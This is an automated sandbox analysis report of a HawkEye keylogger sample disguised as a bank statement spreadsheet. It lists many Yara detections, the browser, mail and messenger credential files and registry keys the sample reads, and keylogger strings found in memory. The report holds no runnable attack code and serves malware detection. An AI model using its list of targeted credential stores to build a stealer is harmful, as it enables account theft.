                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.22d0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.9d0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.23d0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.ad0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.810000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.2150000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.2350000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.810000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.2230000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.2460000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.9d0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.2150000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 37.2.BANK-STATMENT _xlsx.exe.27c0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.2360000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.22c0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, type: UNPACKEDPE
                Yara detected MailPassViewShow sources
                Source: Yara matchFile source: 00000025.00000002.926331050.0000000002857000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000019.00000002.833212497.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.825220908.00000000026B2000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.765500046.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.928753119.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.766725359.0000000002292000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000001.893606211.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.928377317.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.853095833.00000000021E2000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.912543574.00000000022D0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.883606602.0000000002462000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.912719183.0000000002402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.797891393.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.870272329.0000000002837000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.797771687.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.911923188.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.766451642.00000000009D0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.933151800.0000000003AC1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000001.923369049.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.788526759.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.853013004.0000000002150000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.852539322.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.666235176.0000000002782000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.771774923.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.903584502.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.798965975.0000000002252000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.857805866.0000000003A31000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000002.926178784.00000000027C2000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.930718312.00000000022C2000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.886068587.0000000003AC1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000001.813031999.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.930882020.0000000002352000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.916237371.0000000003BB1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.883478400.00000000023D2000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.767298778.00000000023B2000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.930539943.0000000002230000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.911809266.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.798500055.0000000000810000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.853286228.00000000022C2000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.882401105.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.882514988.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000001.785219561.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 6920, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 5676, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 5580, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 6984, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 1548, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 1496, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 5540, type: MEMORY
                Source: Yara matchFile source: 25.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.BANK-STATMENT _xlsx.exe.27a0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.2400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.BANK-STATMENT _xlsx.exe.2750000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.ad0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.22d0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.2230000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.22d0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.9d0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.23d0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.ad0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.810000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.2150000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.2350000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.810000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.2230000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.2460000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 25.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.9d0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.2150000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 37.2.BANK-STATMENT _xlsx.exe.27c0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.2360000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.22c0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, type: UNPACKEDPE
                Tries to harvest and steal browser information (history, passwords, etc)Show sources
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Tries to steal Instant Messenger accounts or passwordsShow sources
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
                Tries to steal Mail credentials (via file access)Show sources
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                Tries to steal Mail credentials (via file registry)Show sources
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword6_2_00402D9A
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword6_2_00402D9A
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: ESMTPPassword6_2_004033D7
                Yara detected WebBrowserPassView password recovery toolShow sources
                Source: Yara matchFile source: 00000025.00000002.926331050.0000000002857000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.852456722.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.826494513.0000000002747000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.825220908.00000000026B2000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.765500046.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.928753119.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.766725359.0000000002292000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.928377317.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.853095833.00000000021E2000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.912543574.00000000022D0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.883606602.0000000002462000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.912719183.0000000002402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.797891393.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.870272329.0000000002837000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.797771687.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.911923188.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.766451642.00000000009D0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.933151800.0000000003AC1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000001.923369049.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.788526759.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.853013004.0000000002150000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.852539322.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.666235176.0000000002782000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.838140213.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.771774923.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.903584502.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.798965975.0000000002252000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.857805866.0000000003A31000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000002.926178784.00000000027C2000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.930718312.00000000022C2000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.886068587.0000000003AC1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000001.813031999.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.930882020.0000000002352000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.916237371.0000000003BB1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.883478400.00000000023D2000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.767298778.00000000023B2000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.930539943.0000000002230000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.911809266.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.798500055.0000000000810000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.853286228.00000000022C2000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.882401105.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001D.00000002.882514988.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 5580, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 6984, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 7044, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 1548, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 1496, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: BANK-STATMENT _xlsx.exe PID: 5540, type: MEMORY
                Source: Yara matchFile source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.BANK-STATMENT _xlsx.exe.27a0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.2400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.BANK-STATMENT _xlsx.exe.2750000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.ad0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.22d0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.2230000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 26.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.22d0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.9d0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.23d0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.ad0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.810000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.2150000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 26.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.2350000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.BANK-STATMENT _xlsx.exe.810000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.2230000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 29.2.BANK-STATMENT _xlsx.exe.2460000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.BANK-STATMENT _xlsx.exe.9d0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.BANK-STATMENT _xlsx.exe.2150000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 37.2.BANK-STATMENT _xlsx.exe.27c0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.BANK-STATMENT _xlsx.exe.2360000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.BANK-STATMENT _xlsx.exe.22c0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, type: UNPACKEDPE

                Remote Access Functionality:

                barindex
                Detected HawkEye RatShow sources
                Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                Source: BANK-STATMENT _xlsx.exe, 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
